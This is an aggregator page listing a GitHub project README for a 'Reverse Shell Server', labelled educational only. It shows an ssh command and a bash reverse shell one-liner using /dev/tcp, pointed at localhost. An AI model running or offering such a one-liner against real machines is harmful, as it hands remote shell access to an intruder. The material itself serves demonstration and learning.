An open API service indexing awesome lists of open source software.

https://github.com/hydro-dev/reverse-shell


https://github.com/hydro-dev/reverse-shell

Last synced: 4 months ago
JSON representation

Awesome Lists containing this project

README

          

# Reverse Shell Server

DISCLAIMER: This application is for educational purposes ONLY.

Not yet ready for production use.

```
ssh user@127.0.0.1 -p 13336
```

```
/bin/bash -c "/bin/bash -i >/dev/tcp/127.0.0.1/13335 0>&1"
```